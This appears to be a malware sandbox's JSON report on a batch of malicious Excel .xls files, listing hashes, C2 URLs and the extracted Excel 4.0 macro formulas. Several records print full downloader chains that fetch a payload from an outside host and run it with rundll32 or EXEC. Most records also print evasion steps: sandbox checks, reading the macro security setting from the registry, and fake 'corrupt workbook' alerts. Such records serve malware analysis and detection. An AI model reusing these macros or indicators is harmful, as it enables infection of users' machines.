{"version":"0.2","sample":{"sample":"","kind":"file","target":"38c5de17c6b844fb5a55dbda0f7ed1841b728c3fa185a8b404921f6d02cff2a9"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"38c5de17c6b844fb5a55dbda0f7ed1841b728c3fa185a8b404921f6d02cff2a9","filesize":104448,"md5":"d3a80b6661f744bfa28ee12c8ca3699b","sha1":"315206a6e0ff5e294c0a0fd6ae59a9b785b55b9a","sha256":"38c5de17c6b844fb5a55dbda0f7ed1841b728c3fa185a8b404921f6d02cff2a9","sha512":"6e7f77e5f0b46651fd9c71e8b53e92eed4840d5ee529acbd8be2d4d401ac9e79784fc26120b2dbe34a913f59b4b5e1eacad5d47572adff02df7a45ae443a3e60","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"38c5de17c6b844fb5a55dbda0f7ed1841b728c3fa185a8b404921f6d02cff2a9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Ynv8XClfof\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"38ff09cd43b2a23e7ced0748c1c80ecf0e8a6d0211701c2a65489dd91caa08a7"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"38ff09cd43b2a23e7ced0748c1c80ecf0e8a6d0211701c2a65489dd91caa08a7","filesize":126464,"md5":"9b837da8517ecee0345f5a834307c552","sha1":"e306d10d83514fe007a2dde3bea215c5f04be6eb","sha256":"38ff09cd43b2a23e7ced0748c1c80ecf0e8a6d0211701c2a65489dd91caa08a7","sha512":"58e083b3dcc02697e53d59e278fc93f676d759eed7d3593bc4990e852b0d9d81347497de296413f926d0e481326b099c47b401df56bdcc85c1d7cebaa08ccf9e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"38ff09cd43b2a23e7ced0748c1c80ecf0e8a6d0211701c2a65489dd91caa08a7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3907c89c43f8213e0bec930fbb92b627da9ba1c193fdb0ced2f4811b845b083d"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"3907c89c43f8213e0bec930fbb92b627da9ba1c193fdb0ced2f4811b845b083d","filesize":145920,"md5":"51f218c4e5dce3a0b5ebef66b6f2e3a0","sha1":"a0d8fcaf7a0d5f4eceaf2e1740e07fcd552070c7","sha256":"3907c89c43f8213e0bec930fbb92b627da9ba1c193fdb0ced2f4811b845b083d","sha512":"6b29daa9c0094590b1b1c4c6f010640bf91ca235fae440c24128b364745225148ea3d2f3bd91c32853c3fa739bb9216d080d52609c721b9323658a62ea5bdda5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3907c89c43f8213e0bec930fbb92b627da9ba1c193fdb0ced2f4811b845b083d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"3qpT06QsFU\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"391ec63bc77d2c2bbee4fedf3c745930127efd96e74265dfeab2455ebea2bc4f"},"analysis":{"reported":"2020-04-09T16:15:47Z","score":10},"files":[{"filename":"391ec63bc77d2c2bbee4fedf3c745930127efd96e74265dfeab2455ebea2bc4f","filesize":113664,"md5":"588fa206f4da3d16ae8ea3d9be443b3e","sha1":"19b2ed5863254f7029cfc356afd7bb7c83905888","sha256":"391ec63bc77d2c2bbee4fedf3c745930127efd96e74265dfeab2455ebea2bc4f","sha512":"cfa2ef83f4b4cce96d0f5c1c673570f38b28abad5d3f61d89404a9c4259f066a23ba41cd094d3f317a35cc55c392cb0814d443272bd98324b2e46d9a9a624920","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"391ec63bc77d2c2bbee4fedf3c745930127efd96e74265dfeab2455ebea2bc4f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"y0Bm6o2UB3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"391f69e5872dee53e26b894c4b32132753418859b63350688ef917eb7b1d8d29"},"analysis":{"reported":"2020-04-09T16:15:47Z","score":10},"files":[{"filename":"391f69e5872dee53e26b894c4b32132753418859b63350688ef917eb7b1d8d29","filesize":196608,"md5":"b7270d60748adce76fb36fdd1668a267","sha1":"132966f33f94ac06955d27cb987ee829bc4c3e1d","sha256":"391f69e5872dee53e26b894c4b32132753418859b63350688ef917eb7b1d8d29","sha512":"0eec66d2aab052182325c7491638f96e69c4531b002457b6ccd5db5569263cd1eb4f0f99403af8fab6cf812a631d3d8bf9b6aa1cb8e85c0c7000fe3bfba0b9fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"391f69e5872dee53e26b894c4b32132753418859b63350688ef917eb7b1d8d29.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/SDVJbsldkcvg1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"39529663e0bb47d7dfd87fdaa18d30e0aecb1a85bd63b5bd36e041e763720fb1"},"analysis":{"reported":"2020-04-09T16:15:47Z","score":10},"files":[{"filename":"39529663e0bb47d7dfd87fdaa18d30e0aecb1a85bd63b5bd36e041e763720fb1","filesize":209920,"md5":"f86f3fc47f79e85ba547af0850e57906","sha1":"f3b9a117c4cf5ec0a76122cef5dd275bb30ed39e","sha256":"39529663e0bb47d7dfd87fdaa18d30e0aecb1a85bd63b5bd36e041e763720fb1","sha512":"005035872bb47eef850e48bf7deb7f76a81061c2b254b2c1b477ac139d21696105faa8f26966348e28bb7a18f0beac52ef49c4296cfe21979245871c72172ab5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"39529663e0bb47d7dfd87fdaa18d30e0aecb1a85bd63b5bd36e041e763720fb1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0SlNvaPGGA\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"39784d0bd106dec431057134bfbbf460fe63be420c5a879ab8b67a832f6ebd35"},"analysis":{"reported":"2020-04-09T16:15:47Z","score":10},"files":[{"filename":"39784d0bd106dec431057134bfbbf460fe63be420c5a879ab8b67a832f6ebd35","filesize":104448,"md5":"e3c04f948924cef723b5df58d21093ff","sha1":"940d5d19e3536b034934f94cc607994acb22cf23","sha256":"39784d0bd106dec431057134bfbbf460fe63be420c5a879ab8b67a832f6ebd35","sha512":"e0e7ac10c3f01b17883391eca2d2deaa67b1e90b9e5abb5b35a219430ed8201c366e238fcf9c16b59dfa89bae4e42e8fb1b2d260fb4a9089bf89bba943862cb9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"39784d0bd106dec431057134bfbbf460fe63be420c5a879ab8b67a832f6ebd35.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"rkmo4qOciB\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"397fc0d24389f7bb04720b35a82b1a31def71f85e3fef0e8b447658f8cd989d5"},"analysis":{"reported":"2020-04-09T16:15:47Z","score":10},"files":[{"filename":"397fc0d24389f7bb04720b35a82b1a31def71f85e3fef0e8b447658f8cd989d5","filesize":144896,"md5":"bbe6223fafb8e67f7470e94fd81aa337","sha1":"0c83f3a8b97d946b81cf711f4a685ce6e5dac131","sha256":"397fc0d24389f7bb04720b35a82b1a31def71f85e3fef0e8b447658f8cd989d5","sha512":"71b989f5efbc8406465306dabc263431fb5fc24281c1a6455ee5880f7899a9b544bfac840596631086dbcdf9534d5e06dbaca3fc745d7fe65f3fcff8d3a73180","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"397fc0d24389f7bb04720b35a82b1a31def71f85e3fef0e8b447658f8cd989d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"398a76bbc5772d1b6ccf4889d532a81e3558f80af28b3e5c2d557ccc99c7be83"},"analysis":{"reported":"2020-04-09T16:15:48Z","score":10},"files":[{"filename":"398a76bbc5772d1b6ccf4889d532a81e3558f80af28b3e5c2d557ccc99c7be83","filesize":168960,"md5":"eabf5f89e74cac494d7748be7abb25cf","sha1":"a51f6736584965cc82229ab9907be1f72cee0c35","sha256":"398a76bbc5772d1b6ccf4889d532a81e3558f80af28b3e5c2d557ccc99c7be83","sha512":"7589fdc2c5abbe76cf4ecb0d8e06148af236592f7c014de91654a68f11a487b013eec42db8293e66e5db87a7ec735a50c84049a7cc967567c6aada15dabf2197","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"398a76bbc5772d1b6ccf4889d532a81e3558f80af28b3e5c2d557ccc99c7be83.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8y1KI5dOyx\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"399ce3870f584206961beba805b59d3ef9566552bfa67b318ab410d24ef661f0"},"analysis":{"reported":"2020-04-09T16:15:48Z","score":10},"files":[{"filename":"399ce3870f584206961beba805b59d3ef9566552bfa67b318ab410d24ef661f0","filesize":167936,"md5":"d0affe32281abd38f8140a4c58ff822f","sha1":"64e56a70655cb2750c643bd7c98c8e194d1f47b8","sha256":"399ce3870f584206961beba805b59d3ef9566552bfa67b318ab410d24ef661f0","sha512":"6d342f2020fa9bb01cd0da3b0ecf9dfba965e943f440539a481bbf4e0c10545eb60ae0d72b391ea7a0b937d49a11ab7717500b0b1ffd8f36247f7fc00cc2cd1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"399ce3870f584206961beba805b59d3ef9566552bfa67b318ab410d24ef661f0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"i4FZS3AkNG\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"39e1da9a6503f20cd7b8dc678028526d26d2e8bf610f0af4bdb56f4077c34347"},"analysis":{"reported":"2020-04-09T16:15:48Z","score":10},"files":[{"filename":"39e1da9a6503f20cd7b8dc678028526d26d2e8bf610f0af4bdb56f4077c34347","filesize":185344,"md5":"999d79b6ea63264f0919240a41f94471","sha1":"45c1ddfc70d447329abfb9ec3ebb6a1d3339e111","sha256":"39e1da9a6503f20cd7b8dc678028526d26d2e8bf610f0af4bdb56f4077c34347","sha512":"f567c56227975c6327ad92b88d05b5f859e6c19917944488ebf1eca228635231c3c104899c9692e19d2f5a96571b677a2228ab59d2c479de5613c9707fcfa411","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"39e1da9a6503f20cd7b8dc678028526d26d2e8bf610f0af4bdb56f4077c34347.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"39f4f93d7ff3b049c29ff2c9273db1b06438cb219653ebf793384b45f46b134f"},"analysis":{"reported":"2020-04-09T16:15:48Z","score":10},"files":[{"filename":"39f4f93d7ff3b049c29ff2c9273db1b06438cb219653ebf793384b45f46b134f","filesize":212992,"md5":"7c1e3c20331b166a642d93b315a830f3","sha1":"984737b28f5c686c379317188b384aedcdd1b43d","sha256":"39f4f93d7ff3b049c29ff2c9273db1b06438cb219653ebf793384b45f46b134f","sha512":"36c8c46220c24114c65b7ab634af28bfa28832b88fbd511a16e4d404df3538cc88a17dfc5e2d3bcf8a5a2b7ce617356f7f049ee2a47a71cfcbc3201773dbe29a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"39f4f93d7ff3b049c29ff2c9273db1b06438cb219653ebf793384b45f46b134f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NKDWIOrp9G\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"39f5a9e588d50a9172dc65ca00cd39609b51e6ed3bb03d23d8102e15f1ab50ed"},"analysis":{"reported":"2020-04-09T16:15:48Z","score":10},"files":[{"filename":"39f5a9e588d50a9172dc65ca00cd39609b51e6ed3bb03d23d8102e15f1ab50ed","filesize":185344,"md5":"624d6688f018fec78b997e920e4fe36a","sha1":"476df9a423a368fc1957cfee9c2b99b8bcf96bb5","sha256":"39f5a9e588d50a9172dc65ca00cd39609b51e6ed3bb03d23d8102e15f1ab50ed","sha512":"6ba7398d549b425019bb6c1e6f49072ea921bcc0628ab2503a71ff20de79bc144564391e8d7ef38bed38393ab7f32e936e4c4b87a67198b7768a832052ef30d9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"39f5a9e588d50a9172dc65ca00cd39609b51e6ed3bb03d23d8102e15f1ab50ed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"39fac942da19ebffd029eaa49ffdf988b959cc8fd552e551fd899fdac0f28f14"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"39fac942da19ebffd029eaa49ffdf988b959cc8fd552e551fd899fdac0f28f14","filesize":142848,"md5":"898e0785c75351dcd4fae48f7e6ba925","sha1":"b7d8e9f47fd20213068c90e1fac28f13ed4616cd","sha256":"39fac942da19ebffd029eaa49ffdf988b959cc8fd552e551fd899fdac0f28f14","sha512":"1ce76a01df899947928d62c04ece61f64acf6d443fd7d2d257bdd8e08107e311372004c3b93aaa4720eecf8b299fa6e8a1574f5339ae5be9db8dec8cb502b324","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"39fac942da19ebffd029eaa49ffdf988b959cc8fd552e551fd899fdac0f28f14.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"jMYahIRrJ0\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a0ea7cef74d93a40c10720357e7aef0967316239d1d8ea54dc0019dbc2c4d74"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a0ea7cef74d93a40c10720357e7aef0967316239d1d8ea54dc0019dbc2c4d74","filesize":207360,"md5":"8a8a6d1dd54d15c8602ab16a22a66235","sha1":"df6a7178d61b019aa5b8ecec58d291ec473bc23d","sha256":"3a0ea7cef74d93a40c10720357e7aef0967316239d1d8ea54dc0019dbc2c4d74","sha512":"e16a9489d0308996c1ade76e0fb9841e6a0aa6272ec34bd06db3d88b5257b02236f4e853b0a3f3fca35ff5d03537c47fa3e8e2ecbef828ba4d6a10d29d7e5896","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a0ea7cef74d93a40c10720357e7aef0967316239d1d8ea54dc0019dbc2c4d74.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zHBpjeiP8g\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a1d7c2dcdd9bd517b1a6c3d4ba74701a99ca9f818d12d4b67aa396ec9018e1d"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a1d7c2dcdd9bd517b1a6c3d4ba74701a99ca9f818d12d4b67aa396ec9018e1d","filesize":185344,"md5":"9f4c94d9b743720dcf66681ed64069b2","sha1":"7c9a4c0532eb7419e265f718adf1bab7f79fa380","sha256":"3a1d7c2dcdd9bd517b1a6c3d4ba74701a99ca9f818d12d4b67aa396ec9018e1d","sha512":"5b8495374606e1165090f749627624d1b9984940ddc64796af1a2a130c337fdd55d64106354dd60ecc05f0eef3be135e9e8dc0c2751224c24efde5206a747988","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a1d7c2dcdd9bd517b1a6c3d4ba74701a99ca9f818d12d4b67aa396ec9018e1d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
